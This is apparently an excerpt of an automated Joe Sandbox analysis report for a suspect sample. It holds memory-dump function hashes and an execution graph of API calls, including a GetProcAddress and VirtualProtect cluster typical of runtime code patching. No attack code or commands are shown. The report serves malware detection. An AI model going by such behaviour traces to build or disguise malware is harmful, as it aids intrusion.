                                                                                                                                                • Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d7c062dcb78c55b78641b1bba7ee9c0f1ad3640d7863db6ccfaaeaa71cc7c36d
                                                                                                                                                • Instruction ID: bbe4947f576c9f741330fb9b4a270082eeaa2a5cf4e7656507b4b495d5b14704
                                                                                                                                                • Opcode Fuzzy Hash: d7c062dcb78c55b78641b1bba7ee9c0f1ad3640d7863db6ccfaaeaa71cc7c36d
                                                                                                                                                • Instruction Fuzzy Hash: 1D212671B04200EFDB05DF14D9D0B26BBE5FB88314F24C6ADE8094B296C33AD846CA61
                                                                                                                                                Function 00B6D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e951f6c12f3df9b44bc0408da32feb3fbeca417960ad2ecce6878b8e41c20573
                                                                                                                                                • Instruction ID: c2bad1aaeea3e03c879a4d0fc1082015bd202c7d380aa12332b359d5ad8f1712
                                                                                                                                                • Opcode Fuzzy Hash: e951f6c12f3df9b44bc0408da32feb3fbeca417960ad2ecce6878b8e41c20573
                                                                                                                                                • Instruction Fuzzy Hash: F5210475A04240DFCB14DF14D9D4B26BFA5FB88314F24C5ADE90A4B296C33BD847CAA1
                                                                                                                                                Function 00B6D006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6cbc84a2219a5c2c3838b2660958e28eaff3efa6579793a258c70d3279291648
                                                                                                                                                • Instruction ID: c589b65231e00a78cb9947609e976e77645f2d166a2a967d8dfe7023da2c8164
                                                                                                                                                • Opcode Fuzzy Hash: 6cbc84a2219a5c2c3838b2660958e28eaff3efa6579793a258c70d3279291648
                                                                                                                                                • Instruction Fuzzy Hash: BF2184755083809FDB02CF14D994B11BFB1FB56314F28C5DAD8498F2A7C33A985ACB62
                                                                                                                                                Function 00B5D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                • Instruction ID: 8da9cef36c84af1edd46f5655858c0c2c73c8e6a7ee7529a9d6add7bd554e161
                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                • Instruction Fuzzy Hash: 4811CD72504240CFDB16CF00D5C4B16BFA2FB94324F24C2E9DD090A256C33AE85ACBA1
                                                                                                                                                Function 00B6D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036337905.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b6d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction ID: 49cb53afbdab6e5e606156f86fd72f963bc6415acd62360bdd785a61e3fe8766
                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction Fuzzy Hash: 07118B75A04280DFDB16CF14D5D4B15BBA1FB84314F28C6AAD8494B696C33AD84ACB61
                                                                                                                                                Function 00B5D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4ae3031b3dfd620ddd067b5806df9ef25669c023916de20b34aa6f8193fd16a3
                                                                                                                                                • Instruction ID: 6d3e0b79ebb6a799b07844ca694e23f6a582c28b2f3c722920b97b51daadbb4d
                                                                                                                                                • Opcode Fuzzy Hash: 4ae3031b3dfd620ddd067b5806df9ef25669c023916de20b34aa6f8193fd16a3
                                                                                                                                                • Instruction Fuzzy Hash: 7E01F7711083409AE7208B25CDC4B67BFD8DF49326F18C6EAED080A286D6799C49CA71
                                                                                                                                                Function 00B5D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a7aa3b5c08d70efd2401742c92cf924e5a898f19050e62645c0412a0284b0743
                                                                                                                                                • Instruction ID: 91afcd5fc01951549d48443c5de77fcc39b371671a3b5c2aa978f1430a66009e
                                                                                                                                                • Opcode Fuzzy Hash: a7aa3b5c08d70efd2401742c92cf924e5a898f19050e62645c0412a0284b0743
                                                                                                                                                • Instruction Fuzzy Hash: F1F062714043449EE7208F16C8C8B62FFE8EB55735F18C59AED084B286C2799C44CAB1

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:1659
                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                execution_graph 6731 10007a80 6732 10007a8d 6731->6732 6733 1000637b __dosmaperr 20 API calls 6732->6733 6734 10007aa7 6733->6734 6735 1000571e _free 20 API calls 6734->6735 6736 10007ab3 6735->6736 6737 1000637b __dosmaperr 20 API calls 6736->6737 6741 10007ad9 6736->6741 6738 10007acd 6737->6738 6740 1000571e _free 20 API calls 6738->6740 6739 10005eb7 11 API calls 6739->6741 6740->6741 6741->6739 6742 10007ae5 6741->6742 7171 10007103 GetCommandLineA GetCommandLineW 7172 10005303 7175 100050a5 7172->7175 7184 1000502f 7175->7184 7178 1000502f 5 API calls 7179 100050c3 7178->7179 7180 10005000 20 API calls 7179->7180 7181 100050ce 7180->7181 7182 10005000 20 API calls 7181->7182 7183 100050d9 7182->7183 7185 10005048 7184->7185 7186 10002ada _ValidateLocalCookies 5 API calls 7185->7186 7187 10005069 7186->7187 7187->7178 6743 10009c88 6744 10009c95 6743->6744 6745 10009ca9 6744->6745 6750 10009ccd 6744->6750 6754 10009cc0 6744->6754 6746 10009cb0 6745->6746 6747 10009cc4 6745->6747 6749 10006368 __dosmaperr 20 API calls 6746->6749 6748 10006332 __dosmaperr 20 API calls 6747->6748 6748->6754 6752 10009cb5 6749->6752 6753 10006368 __dosmaperr 20 API calls 6750->6753 6750->6754 6751 10002ada _ValidateLocalCookies 5 API calls 6755 10009d15 6751->6755 6756 10006355 __dosmaperr 20 API calls 6752->6756 6757 10009cf2 6753->6757 6754->6751 6756->6754 6758 10006355 __dosmaperr 20 API calls 6757->6758 6758->6754 6759 10008a89 6762 10006d60 6759->6762 6763 10006d69 6762->6763 6764 10006d72 6762->6764 6766 10006c5f 6763->6766 6767 10005af6 _abort 38 API calls 6766->6767 6768 10006c6c 6767->6768 6769 10006d7e 38 API calls 6768->6769 6770 10006c74 6769->6770 6786 100069f3 6770->6786 6773 10006c8b 6773->6764 6778 1000571e _free 20 API calls 6778->6773 6779 10006cc9 6780 10006368 __dosmaperr 20 API calls 6779->6780 6785 10006cce 6780->6785 6781 10006d12 6781->6785 6810 100068c9 6781->6810 6782 10006ce6 6782->6781 6783 1000571e _free 20 API calls 6782->6783 6783->6781 6785->6778 6787 100054a7 38 API calls 6786->6787 6788 10006a05 6787->6788 6789 10006a14 GetOEMCP 6788->6789 6790 10006a26 6788->6790 6792 10006a3d 6789->6792 6791 10006a2b GetACP 6790->6791 6790->6792 6791->6792 6792->6773 6793 100056d0 6792->6793 6794 1000570e 6793->6794 6798 100056de __dosmaperr 6793->6798 6795 10006368 __dosmaperr 20 API calls 6794->6795 6797 1000570c 6795->6797 6796 100056f9 RtlAllocateHeap 6796->6797 6796->6798 6797->6785 6800 10006e20 6797->6800 6798->6794 6798->6796 6799 1000474f __dosmaperr 7 API calls 6798->6799 6799->6798 6801 100069f3 40 API calls 6800->6801 6802 10006e3f 6801->6802 6805 10006e90 IsValidCodePage 6802->6805 6807 10006e46 6802->6807 6809 10006eb5 ___scrt_fastfail 6802->6809 6803 10002ada _ValidateLocalCookies 5 API calls 6804 10006cc1 6803->6804 6804->6779 6804->6782 6806 10006ea2 GetCPInfo 6805->6806 6805->6807 6806->6807 6806->6809 6807->6803 6813 10006acb GetCPInfo 6809->6813 6886 10006886 6810->6886 6812 100068ed 6812->6785 6814 10006baf 6813->6814 6816 10006b05 6813->6816 6818 10002ada _ValidateLocalCookies 5 API calls 6814->6818 6823 100086e4 6816->6823 6820 10006c5b 6818->6820 6820->6807 6822 10008a3e 43 API calls 6822->6814 6824 100054a7 38 API calls 6823->6824 6825 10008704 MultiByteToWideChar 6824->6825 6827 10008742 6825->6827 6828 100087da 6825->6828 6831 100056d0 21 API calls 6827->6831 6834 10008763 ___scrt_fastfail 6827->6834 6829 10002ada _ValidateLocalCookies 5 API calls 6828->6829 6832 10006b66 6829->6832 6830 100087d4 6842 10008801 6830->6842 6831->6834 6837 10008a3e 6832->6837 6834->6830 6835 100087a8 MultiByteToWideChar 6834->6835 6835->6830 6836 100087c4 GetStringTypeW 6835->6836 6836->6830 6838 100054a7 38 API calls 6837->6838 6839 10008a51 6838->6839 6846 10008821 6839->6846 6843 1000880d 6842->6843 6844 1000881e 6842->6844 6843->6844 6845 1000571e _free 20 API calls 6843->6845 6844->6828 6845->6844 6848 1000883c 6846->6848 6847 10008862 MultiByteToWideChar 6849 10008a16 6847->6849 6850 1000888c 6847->6850 6848->6847 6851 10002ada _ValidateLocalCookies 5 API calls 6849->6851 6855 100056d0 21 API calls 6850->6855 6857 100088ad 6850->6857 6852 10006b87 6851->6852 6852->6822 6853 100088f6 MultiByteToWideChar 6854 10008962 6853->6854 6856 1000890f 6853->6856 6859 10008801 __freea 20 API calls 6854->6859 6855->6857 6873 10005f19 6856->6873 6857->6853 6857->6854 6859->6849 6861 10008971 6863 100056d0 21 API calls 6861->6863 6867 10008992 6861->6867 6862 10008939 6862->6854 6864 10005f19 11 API calls 6862->6864 6863->6867 6864->6854 6865 10008a07 6866 10008801 __freea 20 API calls 6865->6866 6866->6854 6867->6865 6868 10005f19 11 API calls 6867->6868 6869 100089e6 6868->6869 6869->6865 6870 100089f5 WideCharToMultiByte 6869->6870 6870->6865 6871 10008a35 6870->6871 6872 10008801 __freea 20 API calls 6871->6872 6872->6854 6874 10005c45 __dosmaperr 5 API calls 6873->6874 6875 10005f40 6874->6875 6878 10005f49 6875->6878 6881 10005fa1 6875->6881 6879 10002ada _ValidateLocalCookies 5 API calls 6878->6879 6880 10005f9b 6879->6880 6880->6854 6880->6861 6880->6862 6882 10005c45 __dosmaperr 5 API calls 6881->6882 6883 10005fc8 6882->6883 6884 10002ada _ValidateLocalCookies 5 API calls 6883->6884 6885 10005f89 LCMapStringW 6884->6885 6885->6878 6887 10006892 ___scrt_is_nonwritable_in_current_image 6886->6887 6894 10005671 RtlEnterCriticalSection 6887->6894 6889 1000689c 6895 100068f1 6889->6895 6893 100068b5 _abort 6893->6812 6894->6889 6907 10007011 6895->6907 6897 1000693f 6898 10007011 26 API calls 6897->6898 6899 1000695b 6898->6899 6900 10007011 26 API calls 6899->6900 6901 10006979 6900->6901 6902 100068a9 6901->6902 6903 1000571e _free 20 API calls 6901->6903 6904 100068bd 6902->6904 6903->6902 6921 100056b9 RtlLeaveCriticalSection 6904->6921 6906 100068c7 6906->6893 6908 10007022 6907->6908 6917 1000701e 6907->6917 6909 10007029 6908->6909 6913 1000703c ___scrt_fastfail 6908->6913 6910 10006368 __dosmaperr 20 API calls 6909->6910 6911 1000702e 6910->6911 6912 100062ac ___std_exception_copy 26 API calls 6911->6912 6912->6917 6914 10007073 6913->6914 6915 1000706a 6913->6915 6913->6917 6914->6917 6919 10006368 __dosmaperr 20 API calls 6914->6919 6916 10006368 __dosmaperr 20 API calls 6915->6916 6918 1000706f 6916->6918 6917->6897 6920 100062ac ___std_exception_copy 26 API calls 6918->6920 6919->6918 6920->6917 6921->6906 6922 1000508a 6923 100050a2 6922->6923 6924 1000509c 6922->6924 6925 10005000 20 API calls 6924->6925 6925->6923 6021 1000220c 6022 10002215 6021->6022 6023 1000221a dllmain_dispatch 6021->6023 6025 100022b1 6022->6025 6026 100022c7 6025->6026 6028 100022d0 6026->6028 6029 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6026->6029 6028->6023 6029->6028 6926 10003c90 RtlUnwind 6030 10002418 6031 10002420 ___scrt_release_startup_lock 6030->6031 6034 100047f5 6031->6034 6033 10002448 6035 10004804 6034->6035 6036 10004808 6034->6036 6035->6033 6039 10004815 6036->6039 6040 10005b7a __dosmaperr 20 API calls 6039->6040 6043 1000482c 6040->6043 6041 10002ada _ValidateLocalCookies 5 API calls 6042 10004811 6041->6042 6042->6033 6043->6041 6927 10004a9a 6930 10005411 6927->6930 6931 1000541d _abort 6930->6931 6932 10005af6 _abort 38 API calls 6931->6932 6935 10005422 6932->6935 6933 100055a8 _abort 38 API calls 6934 1000544c 6933->6934 6935->6933 7579 1000679a 7580 100067a4 7579->7580 7581 100067b4 7580->7581 7583 1000571e _free 20 API calls 7580->7583 7582 1000571e _free 20 API calls 7581->7582 7584 100067bb 7582->7584 7583->7580 6044 1000281c 6047 10002882 6044->6047 6050 10003550 6047->6050 6049 1000282a 6051 1000355d 6050->6051 6054 1000358a 6050->6054 6052 100047e5 ___std_exception_copy 21 API calls 6051->6052 6051->6054 6053 1000357a 6052->6053 6053->6054 6056 1000544d 6053->6056 6054->6049 6057 1000545a 6056->6057 6058 10005468 6056->6058 6057->6058 6063 1000547f 6057->6063 6059 10006368 __dosmaperr 20 API calls 6058->6059 6060 10005470 6059->6060 6065 100062ac 6060->6065 6062 1000547a 6062->6054 6063->6062 6064 10006368 __dosmaperr 20 API calls 6063->6064 6064->6060 6068 10006231 6065->6068 6067 100062b8 6067->6062 6069 10005b7a __dosmaperr 20 API calls 6068->6069 6070 10006247 6069->6070 6071 100062a6 6070->6071 6075 10006255 6070->6075 6079 100062bc IsProcessorFeaturePresent 6071->6079 6073 100062ab 6074 10006231 ___std_exception_copy 26 API calls 6073->6074 6076 100062b8 6074->6076 6077 10002ada _ValidateLocalCookies 5 API calls 6075->6077 6076->6067 6078 1000627c 6077->6078 6078->6067 6080 100062c7 6079->6080 6083 100060e2 6080->6083 6084 100060fe ___scrt_fastfail 6083->6084 6085 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6084->6085 6087 100061fb ___scrt_fastfail 6085->6087 6086 10002ada _ValidateLocalCookies 5 API calls 6088 10006219 GetCurrentProcess TerminateProcess 6086->6088 6087->6086 6088->6073 7588 100021a1 ___scrt_dllmain_exception_filter 6089 10009c23 6090 10009c56 6089->6090 6091 10009c28 6089->6091 6127 10009728 6090->6127 6092 10009c46 6091->6092 6093 10009c2d 6091->6093 6119 100098f5 6092->6119 6095 10009ccd 6093->6095 6112 10009807 6093->6112 6098 10006368 __dosmaperr 20 API calls 6095->6098 6103 10009cc0 6095->6103 6100 10009cf2 6098->6100 6099 10009bf2 6099->6095 6102 10009ca9 6099->6102 6099->6103 6101 10006355 __dosmaperr 20 API calls 6100->6101 6101->6103 6105 10009cb0 6102->6105 6106 10009cc4 6102->6106 6104 10002ada _ValidateLocalCookies 5 API calls 6103->6104 6107 10009d15 6104->6107 6109 10006368 __dosmaperr 20 API calls 6105->6109 6137 10006332 6106->6137 6110 10009cb5 6109->6110 6134 10006355 6110->6134 6114 10009816 6112->6114 6113 100098d8 6116 10002ada _ValidateLocalCookies 5 API calls 6113->6116 6114->6113 6115 10009894 WriteFile 6114->6115 6115->6114 6117 100098da GetLastError 6115->6117 6118 100098f1 6116->6118 6117->6113 6118->6099 6120 10009904 6119->6120 6121 10009a0f 6120->6121 6124 10009986 WideCharToMultiByte 6120->6124 6126 100099bb WriteFile 6120->6126 6122 10002ada _ValidateLocalCookies 5 API calls 6121->6122 6123 10009a1e 6122->6123 6123->6099 6125 10009a07 GetLastError 6124->6125 6124->6126 6125->6121 6126->6120 6126->6125 6132 10009737 6127->6132 6128 100097ea 6129 10002ada _ValidateLocalCookies 5 API calls 6128->6129 6131 10009803 6129->6131 6130 100097a9 WriteFile 6130->6132 6133 100097ec GetLastError 6130->6133 6131->6099 6132->6128 6132->6130 6133->6128 6135 10005b7a __dosmaperr 20 API calls 6134->6135 6136 1000635a 6135->6136 6136->6103 6138 10006355 __dosmaperr 20 API calls 6137->6138 6139 1000633d __dosmaperr 6138->6139 6140 10006368 __dosmaperr 20 API calls 6139->6140 6141 10006350 6140->6141 6141->6103 5763 1000c7a7 5764 1000c7be 5763->5764 5770 1000c82c 5763->5770 5764->5770 5775 1000c7e6 GetModuleHandleA 5764->5775 5766 1000c835 GetModuleHandleA 5769 1000c83f 5766->5769 5767 1000c872 5768 1000c7dd 5768->5769 5768->5770 5772 1000c800 GetProcAddress 5768->5772 5769->5770 5771 1000c85f GetProcAddress 5769->5771 5770->5766 5770->5767 5770->5769 5771->5770 5772->5770 5773 1000c80d VirtualProtect 5772->5773 5773->5770 5774 1000c81c VirtualProtect 5773->5774 5774->5770 5776 1000c82c 5775->5776 5777 1000c7ef 5775->5777 5780 1000c872 5776->5780 5781 1000c835 GetModuleHandleA 5776->5781 5785 1000c83f 5776->5785 5787 1000c803 GetProcAddress 5777->5787 5779 1000c7f4 5779->5776 5782 1000c800 GetProcAddress 5779->5782 5781->5785 5782->5776 5783 1000c80d VirtualProtect 5782->5783 5783->5776 5784 1000c81c VirtualProtect 5783->5784 5784->5776 5785->5776 5786 1000c85f GetProcAddress 5785->5786 5786->5776 5788 1000c82c 5787->5788 5789 1000c80d VirtualProtect 5787->5789 5791 1000c872 5788->5791 5792 1000c835 GetModuleHandleA 5788->5792 5789->5788 5790 1000c81c VirtualProtect 5789->5790 5790->5788 5794 1000c83f 5792->5794 5793 1000c85f GetProcAddress 5793->5794 5794->5788 5794->5793 7589 10009fa7 7590 10006368 __dosmaperr 20 API calls 7589->7590 7591 10009fac 7590->7591 6142 1000742b 6143 10007430 6142->6143 6144 10007453 6143->6144 6146 10008bae 6143->6146 6147 10008bdd 6146->6147 6148 10008bbb 6146->6148 6147->6143 6149 10008bd7 6148->6149 6150 10008bc9 RtlDeleteCriticalSection 6148->6150 6151 1000571e _free 20 API calls 6149->6151 6150->6149 6150->6150 6151->6147 6936 100060ac 6937 100060dd 6936->6937 6939 100060b7 6936->6939 6938 100060c7 FreeLibrary 6938->6939 6939->6937 6939->6938 6940 1000aeac 6941 1000aeb5 6940->6941 6942 10008cc1 21 API calls 6941->6942 6943 1000aebb 6942->6943 6944 1000aedd 6943->6944 6945 10006332 __dosmaperr 20 API calls 6943->6945 6945->6944 6152 10005630 6153 1000563b 6152->6153 6155 10005664 6153->6155 6156 10005660 6153->6156 6158 10005eb7 6153->6158 6165 10005688 6155->6165 6159 10005c45 __dosmaperr 5 API calls 6158->6159 6160 10005ede 6159->6160 6161 10005efc InitializeCriticalSectionAndSpinCount 6160->6161 6162 10005ee7 6160->6162 6161->6162 6163 10002ada _ValidateLocalCookies 5 API calls 6162->6163 6164 10005f13 6163->6164 6164->6153 6166 10005695 6165->6166 6168 100056b4 6165->6168 6167 1000569f RtlDeleteCriticalSection 6166->6167 6167->6167 6167->6168 6168->6156 6950 100096b2 6957 10008dbc 6950->6957 6952 100096c7 6953 100096c2 6953->6952 6954 10005af6 _abort 38 API calls 6953->6954 6955 100096ea 6954->6955 6955->6952 6956 10009708 GetConsoleMode 6955->6956 6956->6952 6958 10008dc9 6957->6958 6960 10008dd6 6957->6960 6959 10006368 __dosmaperr 20 API calls 6958->6959 6962 10008dce 6959->6962 6961 10006368 __dosmaperr 20 API calls 6960->6961 6963 10008de2 6960->6963 6964 10008e03 6961->6964 6962->6953 6963->6953 6965 100062ac ___std_exception_copy 26 API calls 6964->6965 6965->6962 6966 10003eb3 6967 10005411 38 API calls 6966->6967 6968 10003ebb 6967->6968 7192 10008b34 7193 1000637b __dosmaperr 20 API calls 7192->7193 7195 10008b46 7193->7195 7194 1000571e _free 20 API calls 7196 10008ba5 7194->7196 7197 10005eb7 11 API calls 7195->7197 7198 10008b53 7195->7198 7197->7195 7198->7194 7199 10009b3c 7200 10006355 __dosmaperr 20 API calls 7199->7200 7201 10009b44 7200->7201 7202 10006368 __dosmaperr 20 API calls 7201->7202 7203 10009b4b 7202->7203 7204 100062ac ___std_exception_copy 26 API calls 7203->7204 7205 10009b56 7204->7205 7206 10002ada _ValidateLocalCookies 5 API calls 7205->7206 7207 10009d15 7206->7207 6169 1000543d 6170 10005440 6169->6170 6173 100055a8 6170->6173 6184 10007613 6173->6184 6177 100055c2 IsProcessorFeaturePresent 6181 100055cd 6177->6181 6178 100055e0 6214 10004bc1 6178->6214 6180 100055b8 6180->6177 6180->6178 6183 100060e2 _abort 8 API calls 6181->6183 6183->6178 6217 10007581 6184->6217 6187 1000766e 6188 1000767a _abort 6187->6188 6189 10005b7a __dosmaperr 20 API calls 6188->6189 6193 100076a7 _abort 6188->6193 6194 100076a1 _abort 6188->6194 6189->6194 6190 100076f3 6191 10006368 __dosmaperr 20 API calls 6190->6191 6192 100076f8 6191->6192 6195 100062ac ___std_exception_copy 26 API calls 6192->6195 6199 1000771f 6193->6199 6231 10005671 RtlEnterCriticalSection 6193->6231 6194->6190 6194->6193 6213 100076d6 6194->6213 6195->6213 6200 1000777e 6199->6200 6202 10007776 6199->6202 6210 100077a9 6199->6210 6232 100056b9 RtlLeaveCriticalSection 6199->6232 6200->6210 6233 10007665 6200->6233 6205 10004bc1 _abort 28 API calls 6202->6205 6205->6200 6209 10007665 _abort 38 API calls 6209->6210 6236 1000782e 6210->6236 6211 1000780c 6212 10005af6 _abort 38 API calls 6211->6212 6211->6213 6212->6213 6260 1000bdc9 6213->6260 6264 1000499b 6214->6264 6220 10007527 6217->6220 6219 100055ad 6219->6180 6219->6187 6221 10007533 ___scrt_is_nonwritable_in_current_image 6220->6221 6226 10005671 RtlEnterCriticalSection 6221->6226 6223 10007541 6227 10007575 6223->6227 6225 10007568 _abort 6225->6219 6226->6223 6230 100056b9 RtlLeaveCriticalSection 6227->6230 6229 1000757f 6229->6225 6230->6229 6231->6199 6232->6202 6234 10005af6 _abort 38 API calls 6233->6234 6235 1000766a 6234->6235 6235->6209 6237 10007834 6236->6237 6239 100077fd 6236->6239 6263 100056b9 RtlLeaveCriticalSection 6237->6263 6239->6211 6239->6213 6240 10005af6 GetLastError 6239->6240 6241 10005b12 6240->6241 6242 10005b0c 6240->6242 6243 1000637b __dosmaperr 20 API calls 6241->6243 6246 10005b61 SetLastError 6241->6246 6244 10005e08 __dosmaperr 11 API calls 6242->6244 6245 10005b24 6243->6245 6244->6241 6247 10005b2c 6245->6247 6248 10005e5e __dosmaperr 11 API calls 6245->6248 6246->6211 6249 1000571e _free 20 API calls 6247->6249 6250 10005b41 6248->6250 6251 10005b32 6249->6251 6250->6247 6252 10005b48 6250->6252 6253 10005b6d SetLastError 6251->6253 6254 1000593c __dosmaperr 20 API calls 6252->6254 6255 100055a8 _abort 35 API calls 6253->6255 6256 10005b53 6254->6256 6257 10005b79 6255->6257 6258 1000571e _free 20 API calls 6256->6258 6259 10005b5a 6258->6259 6259->6246 6259->6253 6261 10002ada _ValidateLocalCookies 5 API calls 6260->6261 6262 1000bdd4 6261->6262 6262->6262 6263->6239 6265 100049a7 _abort 6264->6265 6266 100049bf 6265->6266 6286 10004af5 GetModuleHandleW 6265->6286 6295 10005671 RtlEnterCriticalSection 6266->6295 6270 10004a65 6303 10004aa5 6270->6303 6274 10004a3c 6275 10004a54 6274->6275 6299 10004669 6274->6299 6281 10004669 _abort 5 API calls 6275->6281 6276 100049c7 6276->6270 6276->6274 6296 1000527a 6276->6296 6277 10004a82 6306 10004ab4 6277->6306 6278 10004aae 6279 1000bdc9 _abort 5 API calls 6278->6279 6284 10004ab3 6279->6284 6281->6270 6287 100049b3 6286->6287 6287->6266 6288 10004b39 GetModuleHandleExW 6287->6288 6289 10004b63 GetProcAddress 6288->6289 6290 10004b78 6288->6290 6289->6290 6291 10004b95 6290->6291 6292 10004b8c FreeLibrary 6290->6292 6293 10002ada _ValidateLocalCookies 5 API calls 6291->6293 6292->6291 6294 10004b9f 6293->6294 6294->6266 6295->6276 6314 10005132 6296->6314 6300 10004698 6299->6300 6301 10002ada _ValidateLocalCookies 5 API calls 6300->6301 6302 100046c1 6301->6302 6302->6275 6336 100056b9 RtlLeaveCriticalSection 6303->6336 6305 10004a7e 6305->6277 6305->6278 6337 10006025 6306->6337 6309 10004ae2 6312 10004b39 _abort 8 API calls 6309->6312 6310 10004ac2 GetPEB 6310->6309 6311 10004ad2 GetCurrentProcess TerminateProcess 6310->6311 6311->6309 6313 10004aea ExitProcess 6312->6313 6317 100050e1 6314->6317 6316 10005156 6316->6274 6318 100050ed ___scrt_is_nonwritable_in_current_image 6317->6318 6325 10005671 RtlEnterCriticalSection 6318->6325 6320 100050fb 6326 1000515a 6320->6326 6324 10005119 _abort 6324->6316 6325->6320 6327 1000517a 6326->6327 6330 10005182 6326->6330 6328 10002ada _ValidateLocalCookies 5 API calls 6327->6328 6329 10005108 6328->6329 6332 10005126 6329->6332 6330->6327 6331 1000571e _free 20 API calls 6330->6331 6331->6327 6335 100056b9 RtlLeaveCriticalSection 6332->6335 6334 10005130 6334->6324 6335->6334 6336->6305 6338 1000604a 6337->6338 6342 10006040 6337->6342 6339 10005c45 __dosmaperr 5 API calls 6338->6339 6339->6342 6340 10002ada _ValidateLocalCookies 5 API calls 6341 10004abe 6340->6341 6341->6309 6341->6310 6342->6340 7208 10001f3f 7209 10001f4b ___scrt_is_nonwritable_in_current_image 7208->7209 7226 1000247c 7209->7226 7211 10001f52 7212 10002041 7211->7212 7213 10001f7c 7211->7213 7225 10001f57 ___scrt_is_nonwritable_in_current_image 7211->7225 7215 10002639 ___scrt_fastfail 4 API calls 7212->7215 7237 100023de 7213->7237 7216 10002048 7215->7216 7217 10001f8b __RTC_Initialize 7217->7225 7240 100022fc RtlInitializeSListHead 7217->7240 7219 10001f99 ___scrt_initialize_default_local_stdio_options 7241 100046c5 7219->7241 7223 10001fb8 7224 10004669 _abort 5 API calls 7223->7224 7223->7225 7224->7225 7227 10002485 7226->7227 7249 10002933 IsProcessorFeaturePresent 7227->7249 7231 10002496 7232 1000249a 7231->7232 7260 100053c8 7231->7260 7232->7211 7235 100024b1 7235->7211 7236 10003529 ___vcrt_uninitialize 8 API calls 7236->7232 7291 100024b5 7237->7291 7239 100023e5 7239->7217 7240->7219 7243 100046dc 7241->7243 7242 10002ada _ValidateLocalCookies 5 API calls 7244 10001fad 7242->7244 7243->7242 7244->7225 7245 100023b3 7244->7245 7246 100023b8 ___scrt_release_startup_lock 7245->7246 7247 10002933 ___isa_available_init IsProcessorFeaturePresent 7246->7247 7248 100023c1 7246->7248 7247->7248 7248->7223 7250 10002491 7249->7250 7251 100034ea 7250->7251 7252 100034ef ___vcrt_initialize_winapi_thunks 7251->7252 7263 10003936 7252->7263 7255 100034fd 7255->7231 